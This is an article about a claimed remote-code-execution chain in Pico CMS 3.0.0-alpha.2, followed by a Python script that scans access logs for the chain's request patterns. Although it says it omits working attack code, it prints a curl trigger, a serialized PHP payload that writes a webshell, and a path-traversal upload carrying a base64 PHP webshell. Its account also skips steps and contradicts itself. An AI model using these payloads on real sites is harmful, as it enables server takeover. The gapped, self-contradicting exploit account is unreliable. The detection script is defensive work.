Pico 3.0.0-alpha.2 Exploit
In the ever-evolving landscape of web development, Content Management Systems (CMS) often serve as the primary target for malicious actors. While production-ready software undergoes rigorous security audits, alpha releases exist in a dangerous limbo—feature-rich enough to deploy, but unstable enough to harbor critical, unpatched vulnerabilities.
Recently, the release of Pico CMS 3.0.0-alpha.2 has caught the attention of the offensive security community. Researchers have identified a chain of weaknesses leading to a reliable proof-of-concept (PoC) exploit, turning this lightweight, flat-file CMS into a vector for Remote Code Execution (RCE).
This article provides a technical breakdown of the Pico 3.0.0-alpha.2 exploit, how it works, the implications of using alpha software in production, and the mitigation strategies for administrators who have inadvertently deployed this version.
Alpha software versions, such as Pico CMS 3.0.0-alpha.2, are early development releases intended for testing and feedback—not production use. They frequently contain unpatched security vulnerabilities. This article explains how to responsibly handle, report, and mitigate potential exploits in alpha software without providing working attack code.
Before dissecting the exploit, it is crucial to understand the target. Pico is a flat-file CMS—meaning it does not require a traditional database like MySQL. Instead, it reads Markdown files directly from the file system. It is popular for its speed, simplicity, and ease of deployment.
Version 3.0.0-alpha.2 represents a significant architectural rewrite from the 2.x series. This rewrite introduced new routing mechanisms, Twig template rendering changes, and a plugin API overhaul. Historically, "alpha.2" is particularly dangerous because the first alpha (alpha.1) catches the obvious syntax errors, while alpha.2 often introduces new features without the hardening of a beta release.
The server parses the YAML, serializes the PHP object, and writes it to a cache file named cached-twig--%3A%2F%2Fdev-null. The attacker then triggers the cache inclusion by visiting a specific crafted URL:
curl https://victim.com/pico/?action=flush_cache
Upon visiting the page, the server executes system('id > pwn.txt'), creating a file confirming the breach.
A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.
!php/object "O:1:\"S\":1:s:4:\"exec\";s:62:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";"
Once shell.php is written, the attacker has permanent access.
Command injection via system() is noisy and may be limited by disable_functions in php.ini. The advanced exploit leverages a file write vulnerability in the plugin handler to upload a webshell.
The Payload:
POST /admin/plugins/PicoFileWrite/ HTTP/1.1
Content-Disposition: form-data; name="file_path"; filename="../../plugins/evil.php"
Content-Disposition: form-data; name="file_content"; base64,PD9waHAgZWNobyBTeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
The server writes a base64-encoded PHP webshell to the plugins directory. The attacker then accesses /?plugin=evil&cmd=ls -la to execute system commands persistently.
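For administrators checking whether an exposed instance saw the request patterns this article describes (a POST to the admin plugin handler, a plugin called with a cmd parameter, the flush_cache trigger, and a Twig cache file whose name decodes to a stream wrapper), the following detection script is an added example, not code from the article or from the Pico project. The log lines are constructed, the combined log format and the rule names are assumptions, and the request body (where the ../ filename travels) is not in an access log, so the traversal check only covers what reaches the URL.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /admin/plugins/PicoFileWrite/ HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?plugin=evil&cmd=ls%20-la HTTP/1.1" 200 1024 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /pico/?action=flush_cache HTTP/1.1" 200 64 "-" "curl/8.0"
192.168.1.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?plugin=Search HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Extracts the method and request target from the quoted request line.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(method: str, target: str) -> list[str]:
    """Return the names of the (assumed) rules a single request matches."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = parse_qs(parts.query)
    hits = []
    # Writes through the admin plugin handler are how the webshell lands on disk.
    if method == "POST" and path.startswith("/admin/plugins/"):
        hits.append("plugin_write")
    # Traversal that reached the URL path or a query value (body is not logged).
    if "../" in path or any("../" in v for vals in query.values() for v in vals):
        hits.append("path_traversal")
    # A plugin invoked together with a cmd parameter: the /?plugin=evil&cmd=... pattern.
    if "plugin" in query and "cmd" in query:
        hits.append("webshell_call")
    # The cache flush is the trigger step for the poisoned cache file.
    if query.get("action") == ["flush_cache"]:
        hits.append("cache_flush")
    return hits


def scan_access_log(log_text: str) -> list[tuple[int, str, list[str]]]:
    """Return (line number, client address, matched rules) for each suspicious line."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        hits = classify_request(match["method"], match["target"])
        if hits:
            findings.append((number, line.split()[0], hits))
    return findings


def is_poisoned_cache_name(filename: str) -> bool:
    """Flag a Twig cache entry whose name decodes to a stream wrapper or traversal,
    like cached-twig--%3A%2F%2Fdev-null in the article; also worth a filesystem sweep."""
    decoded = unquote(filename)
    return filename.startswith("cached-twig--") and ("://" in decoded or "../" in decoded)
```

Run it against the real access log and list the plugins and cache directories for files you did not deploy; any hit from the same client across all three rules is the full chain in order.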